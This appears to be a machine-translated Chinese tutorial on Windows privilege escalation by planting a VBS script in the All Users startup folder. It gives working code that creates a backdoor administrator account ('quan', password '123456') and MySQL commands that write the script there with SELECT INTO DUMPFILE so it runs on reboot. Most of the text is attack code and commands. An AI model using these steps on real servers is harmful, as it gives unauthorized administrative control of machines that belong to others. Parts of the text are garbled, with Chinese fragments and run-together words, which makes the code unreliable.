0x00 principle
Restarting the server will 自动调用import it to C:\Documents and Settings\All Users\"Start" menu\Programs\Start VBS脚本, and execute the user addition and privilege escalation commands.
0x01 Utilization conditions
In both cases, you can use the startup item to escalate the privilege
1. The C:\Documents and Settings\All Users\「开始」菜单\程序\启动directory can be read and written
directly upload the VBS privilege escalation script to the directory
2. root账号Log in to MySQL
0x02 The key to privilege escalation
Start the directoryvbs脚本
0x03 rights escalation steps
1. Upload the VBS privilege escalation script to the startup directory The
VBS privilege escalation script code is as follows:
setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”quan”)
od.SetPassword “123456”
od.SetInfo
Set of=GetObject(os&“/quan”,user)
oe.add os&“/quan”
Second, import the contents of the database table into the startup directory
1, log in to mysql
2,
create a new table under the test database, create table secist(cmd text);
3. Insert the vbs script
insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);
insert into secist values(“a=wshshell.run(“”cmd.exe /c net user quan 123456 /add“”,0)”);
insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators quan /add“”,0)”);
4. Export the vbs script to the startup option
select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs”;
5. Use other methods to enable the server to be upgraded successfully after restarting
0x04 reference
https://www.cnblogs.com/wh4am1/p/6613759.html
"Network Attack and Defense Actual Combat Research-Vulnerability Exploitation and Privilege Escalation" 5.7.2